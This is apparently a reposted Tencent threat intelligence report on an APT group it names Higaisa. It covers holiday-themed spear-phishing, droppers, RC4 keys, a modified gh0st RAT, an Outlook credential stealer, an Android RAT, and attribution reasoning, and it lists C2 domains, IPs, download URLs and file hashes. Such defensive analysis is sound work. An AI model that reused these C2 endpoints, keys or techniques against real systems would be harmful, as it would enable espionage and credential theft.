感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/W87E6_v9YCnsmQWDd7NOHw   一、概述 腾讯安全御见威胁情报中心曾经在2019年年初捕获到一次有意思的攻击活动,该攻击活动一直持续到现在。根据对该组织活动中所使用的攻击技术、被攻击人员背景等分析研判,我们认为该攻击组织为来自朝鲜半岛的一个具有政府背景的APT攻击组织。 根据腾讯安全御见威胁情报中心的大数据分析发现,该组织的攻击活动至少可以追溯到2016年,而一直持续活跃到现在。该组织常利用节假日、朝鲜国庆等朝鲜重要时间节点来进行钓鱼活动,诱饵内容包括新年祝福、元宵祝福、朝鲜国庆祝福,以及重要新闻、海外人员联系录等等。 此外,该攻击组织还具有移动端的攻击能力。被攻击的对象还包括跟朝鲜相关的外交实体(如驻各地大使馆官员)、政府官员、人权组织、朝鲜海外居民、贸易往来人员等。目前监测到的受害国家包括中国、朝鲜、日本、尼泊尔、新加坡、俄罗斯、波兰、瑞士等。 对于该组织的归属,腾讯安全分析了大量样本,我们确信其来自于朝鲜半岛。对攻击背景分析后,我们认为该组织为来自韩国的一个攻击组织。从样本的技术细节、基础设施等经过详细分析后,我们尚无证据证明该组织跟韩国的另一攻击组织DarkHotel(黑店)有关联,即便是攻击对象、某些攻击手法跟DarkHotel(黑店)有一些类似。 我们决定把该组织列为来自韩国的又一独立的攻击组织,取名为”黑格莎(Higaisa)“。源于作者喜欢使用的RC4的解密密钥为“Higaisakora”,取Higaisa的英译。 “黑格莎(Higaisa)”组织攻击流程图: 目前尚不排除该组织为DarkHotel的某一分支。由于受限于样本、受控机、基础设施等等客观情况,可能在组织归属上存在一些细节的误判和遗漏,我们希望安全社区同仁来共同完善该组织的一些细节。 值得注意的是,我们曾在腾讯安全2019年上半年APT总结报告中有提及该组织的攻击活动,当时我们错误的把该组织归属到了Group123。因此也借本文对该错误归属进行勘误和致歉,同时本文也对该活动进行更为详细的活动披露。若存在错误,望安全同仁一起来指正。 “黑格莎(Higaisa)”组织攻击活动的完整技术报告,请从这里下载: https://dlied6.qq.com/invc/qqpcmgr/skin/1572851347.pdf 二、攻击过程 最初始的攻击,从邮件钓鱼开始,邮件内容如下: 邮件内容为韩语的元旦祝福: 而从后面的分析可知,在节假日发祝福邮件投递恶意文件,是该组织的惯用伎俩。 邮件的附件为一个压缩包,解压后为一个可执行文件,该可执行文件其实为一个dropper木马: 执行后,会释放并打开诱饵,以及释放恶意文件carsrvdx.sed到系统目录并通过设置注册表创建服务使得该dll以系统服务的方式开机自启动实现持久化: 其中,payload文件加密存储在资源中,释放的过程涉及简单的RC4解密,密钥为ssove0117: 释放的carsrvdx.sed实际为一个downloader,该文件首先会构造url,从http://info.hangro.net/file/start?session=[8位随机数字]&imsi=0获取要下载的文件名: 得到文件名avp.exe、avpif.exe后再构造以下URL进行下载后再构造以下URL进行下载: http://info.hangro.net/file/start?session=[8位随机数字]&imsi=avp.exe http://info.hangro.net/file/start?session=[8位随机数字]&imsi=avpif.exe 下载回来的文件同样需要经过简单的RC4解密,密钥为Higaisakora.0。下载回来的文件avp.exe(fca3260cff04a9c89e6e5d23a318992c),是一个基于gh0st开源远控框架修改而来远程控制木马,除了命令分发和数据包压缩算法弃用原来的之外,其他内容未发现重大改动,基本保留的原来的框架。 而命令分发部分改动较大,删除了绝大部分的命令处理函数,只保留了插件管理功能,木马的所有功能都将通过插件完成,成功下载了回来的插件为FileManager.dll(dd99d917eb17ddca2fb4460ecf6304b6,注:内存加载不落地),为文件管理插件,其命令分发与gh0st源码相似性达90%以上: 下载回来的另外一个文件为avpif.exe (77100e638dd8ef8db4b3370d066984a9),该文件的功能主要是收集系统信息,并回传。 收集的信息包括: 系统信息:计算机硬件、系统版本、用户信息、系统补丁、网卡信息等 网络信息:本地网络信息 进程列表 显示域、计算机、等共享资源的列表 C盘文件列表 D盘文件列表 E盘文件列表 收集完成后加密上传到服务器中,上传url为:http://180.150.227.24/do/index.php?id=ssss 三、关联分析 通过腾讯安全御见威胁情报中心的大数据分析和挖掘,我们发现大量跟该攻击相关的样本。我们对该组织的攻击活动进行梳理,使我们对该组织的攻击活动有更深入的了解。 1、初始攻击 通过监测发现,攻击活动均为使用鱼叉邮件攻击的方式。而攻击的时间窗口基本都在重要节假日。通过发送节日祝福,附带恶意文件的方式进行攻击。 我们根据payload解密的密码” Higaisakora.0″进行搜索,搜索到了另一篇分析文章:https://malware.prevenity.com/2018/03/happy-new-year-wishes-from-china.html 虽然无法获取该报告中的样本,但根据报告中的截图和描述,可以确定为同一木马的不同变种。而根据该文章的披露,攻击方式同样为通过在节假日发送祝福邮件,并附带恶意文件的方式: 此外,有意思的是,我们发现该邮件的发送邮箱为gov.cn的邮箱,我们猜测攻击者可能首先攻破了某gov.cn的邮箱,然后利用该邮箱继续进行钓鱼工作。同样我们发现发件人邮箱同样存在china字眼,因此我们猜测,该组织习惯利用跟中国有关的邮箱做为跳板来进行下一步的攻击。 2、攻击诱饵 诱饵的类型根据文件种类分为两类,一类为可执行文件,另一类为恶意文档类。 1)可执行文件类诱饵: 可执行文件类又分为两个类型: 类型一:伪装为图像文件或文档文件,运行后会释放相关的图片或文档 该类型的可执行文件的图标一般要么伪装成word、excel、pdf、txt、邮件等软件的图标,要么直接是图片的内容图标: 内容主要分为: (1)传统节假日问候,如新年、元宵节、端午节、圣诞节等: (2)朝鲜国庆、领导人纪念日等相关: (3)新闻: (4)其他(包括色情图片或文本): 类型一诱饵的技术特点 将payload及伪装文件存放在PE资源中; 伪装文件未加密无需解密,payload需使用RC4解密后释放; 字符串以局部数组的形式存储,绝大部分API函数使用动态调用; 释放payload后,创建系统服务将其加载执行。 此外,我们发现这些诱饵内容都非常的及时,如某一诱饵为一个新闻,讲的是牡丹峰团长玄松月在平昌冬奥会前访问韩国: 通过搜索,该新闻是2018年1月22日: 而发现的利用该诱饵攻击的另一攻击样本(fa8c53431746d9ccc550f75f15b14b97),其编译日期为1月26日: 可以发现该组织非常擅长利用最新热点新闻。 类型二:伪装成Winrar、Teamview、播放器等常用软件 如运行后,除了释放原本的安装文件外,还会释放gh0st木马: 释放文件路径:C:\WINDOWS\system32\dilmtxce32.dll,而释放的文件同样需要通过解密,密钥为HXvsEoal_s。 2)恶意文档型诱饵: 我们发现的另一个攻击母体为(a5a0bc689c1ea4b1c1336c1cde9990a4),其路径为\AppData\Roaming\Microsoft\Word\STARTUP\winhelp.wll,而该目录为word的启动文件夹,当word启动的时候,会自动加载该目录下的模块文件。因此该手法常做为office后门加载方式的重要手法。 遗憾的是,我们并未获取到相关的文档文件,因此尚不知该启动文件是执行了某一恶意文档释放的(因为有很多攻击诱饵会利用漏洞等方式释放相关恶意文件到word启动目录),还是其他的母体释放到该目录的。不过我们认为由某一恶意文档通过漏洞释放的可能性更大。 该wll文件加载后,会释放文件在%USERPROFILE%\PolicyDefinitions\MMCSnapins.exe,该文件是个downloader,下载回来的文件有3个,分别为infostealer木马,用于窃取文件目录结构;gh0st RAT插件版;另一个未知的完整功能的RAT木马。 3、解密密码 我们发现该组织非常喜欢使用RC4加密算法,如解密释放的payload,解密下载回来的文件等。我们发现他的payload的解密密码跟随着时间而进行变化,但是downloader下载回来的文件解密木马始终都为Higaisakora.0。目前其解密payload的最新使用的密码为XsDAe0601。我们整理了一份时间和密码的对应表如下(相同的密码只取了一个): 可以看到,随着时间的变化,密码也相应的进行了变化。虽然密码上并未有相应的规律可以获取,但是至少也说明了作者一直在进行更新。 4、其他文件分析 我们还在相关受控机上发现大量其他文件,相信是该组织下发用来进行持续渗透和横向移动的工具。具体如下: 1)键盘记录器 文件BioCredProv.exe(6e95c5c01f94ef7154e30b4b23e81b36) 用于记录按键、窗口信息。 2)邮件相关 out1 .exe (901e131af1ee9e7fb618fc9f13e460a7),pdb为:E:\code\PasswordRecover\do_ok\OutlookPassRecover\Release\OutlookPassRecover.pdb 该文件的功能是outlook密码窃取,窃取的outlook账号密码保存到c:\users\public\result.dat。 文件out12.exe (08993d75bee06fc44c0396b4e643593c),pdb路径为: E:\code\PasswordRecover\outlook\OutlookPasswordRecovery-master\OutlookPasswordRecovery\obj\Release\OutlookPasswordRecovery.pdb 该文件的功能同样为窃取outlook账号密码,窃取的信息保存为Module.log。 根据pdb的路径在github上搜索,发现了该工程: https://github.com/0Fdemir/OutlookPasswordRecovery 跟文件里的完全一致: 3)非插件版的Gh0st RAT 之前发现的gh0st RAT均为插件版的gh0st RAT,也就是说所有功能通过插件来完成,但是我们在某台受控机上还发现一个非插件版的gh0st RAT,并且通过Installer解密数据文件.vnd后执行。 安装器的文件路径为:E:\360Rec\sun.exe(cc63f5420e61f2ee2e0d791e13e963f1) 最后解密后生成的文件C:\\Windows\\system32\\PRT\\WinDef32.dll(c5f0336b18a1929d7bd17d09777bdc6c)就为非插件版的gh0st。 其中主命令分发,只保留了部分gh0st功能,包括文件管理、屏幕监控、键盘记录、远程Shell等,而文件管理功能,保留了gh0st RAT文件管理的全部指令,并增加了获取和设置文件时间的功能。 5、移动端木马分析 通过拓展分析,我们还发现了几个安卓木马,如검찰청(翻译:监察厅).apk(8d3af3fea7cd5f93823562c1a62e598a): 该apk执行后界面如下: 伪装韩国检察厅APP,主要为访问网站http://www.spo.go.kr/spo/index.jsp。 实际上该app为一个远控木马,能够实现手机截屏、GPS位置信息获取、SMS短信获取、通话录音、通讯录获取、下载木马、上传文件等功能。 6、攻击归属分析 1)攻击样本中的地域分析 我们抽取了部分样本对编译的时间戳进行了分析(不包含被篡改的): 可以发现编译的时间主要发生在上午8点后,大部分时间都在晚上23点前。按照普通人的生活习惯,我们认为可能是在东9区的攻击者。正好覆盖朝鲜半岛。 其次我们发现样本中出现的naver.com字符: naver为韩国最大的搜索引擎和门户网站。 2)攻击对象分析: 因为诱饵内容几乎都跟朝鲜有一定的关系,包括朝鲜的国庆、朝鲜的联系人名单等;从钓鱼目标对象来看,基本都为朝鲜的外交官、海外居民、和朝有贸易往来人员等等;从受控机属性来看也几乎都为中朝贸易人员。 因此我们判断攻击的对象为与朝鲜相关的人员。 3)攻击手法 攻击手法包括钓鱼、伪装常用软件、下载插件等等,并且还具有多平台的攻击能力。 4)结论 从上述分析我们认为,攻击者可能来自朝鲜半岛,由于攻击目标为跟朝鲜相关,我们判断攻击者可能来自韩国。其次,从攻击手法、对象来看,跟韩国的另外一个APT攻击组织DarkHotel(黑店)比较类似。但是,从样本、基础设施等分析来看,我们并未发现有跟DarkHotel重叠的部分,也未有明确证据证明跟DarkHotel相关。但我们并不排除该组织或为DarkHotel的分支。 鉴于此,我们决定暂时把该攻击小组列为一个独立的攻击组织,取名为”黑格莎(Higaisa)“。源于作者喜欢使用的RC4的解密密钥为“Higaisakora”,取Higaisa的英译。归属过程可能因信息有限,或存在错误,我们希望安全同仁一起来完善该组织的更多信息。 四、总结 当节假日来临,我们往往会收到来自各地的祝福信息,尤其是单位的邮箱。但是一些别有用心的攻击者往往利用此机会,附带恶意文件进行攻击。而本次攻击主要是针对朝鲜相关的一些政治实体、人权组织、商贸等关系单位和人员,因此也有波及中国境内和朝鲜进行贸易的一些人员。 此外,该攻击组织的攻击武器库也一直在进行更新,而且除了pc端,也具有移动端攻击的能力。我们判断,该攻击活动必然还会继续进行下去,因此我们提醒相关人员,一定要提高安全意识,避免遭受不必要的损失。 五、安全建议 我们建议外贸企业及重要机构参考以下几点加强防御: 1、通过官方渠道或者正规的软件分发渠道下载相关软件; 2、谨慎连接公用的WiFi网络。若必须连接公用WiFi网络,建议不要进行可能泄露机密信息或隐私信息的操作,如收发邮件、IM通信、银行转账等;最好不要在连接公用WiFi时进行常用软件的升级操作; 3、不要打开不明来源的邮件附件、即使查看可疑文档也切勿启用宏代码; 4、及时安装操作系统补丁和Office等重要软件的补丁; 5、使用腾讯电脑管家或腾讯御点终端安全管理系统防御可能的病毒木马攻击; 6、推荐企业用户部署腾讯御界高级威胁检测系统及时捕捉黑客攻击。御界高级威胁检测系统,是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。(https://s.tencent.com/product/gjwxjc/index.html) 六、附录 1、IOCs MD5: 7c94a0e412cc46db5904080980d993c3 6febd1729c49f434b6b062edf8d3e7f3 fca3260cff04a9c89e6e5d23a318992c 77100e638dd8ef8db4b3370d066984a9 dd99d917eb17ddca2fb4460ecf6304b6 7d6f2cd3b7984d112b26ac744af8428d 8d3af3fea7cd5f93823562c1a62e598a C2: info.hangro.net console.hangro.net register.welehope.com www.phpvlan.com wiki.xxxx.com 180.150.227.24 39.109.4.143 103.81.171.157 2、参考文章 1)https://malware.prevenity.com/2018/03/happy-new-year-wishes-from-china.html 2)https://s.tencent.com/research/report/762.html “黑格莎(Higaisa)”组织攻击活动的完整技术报告,请从这里下载: https://dlied6.qq.com/invc/qqpcmgr/skin/1572851347.pdf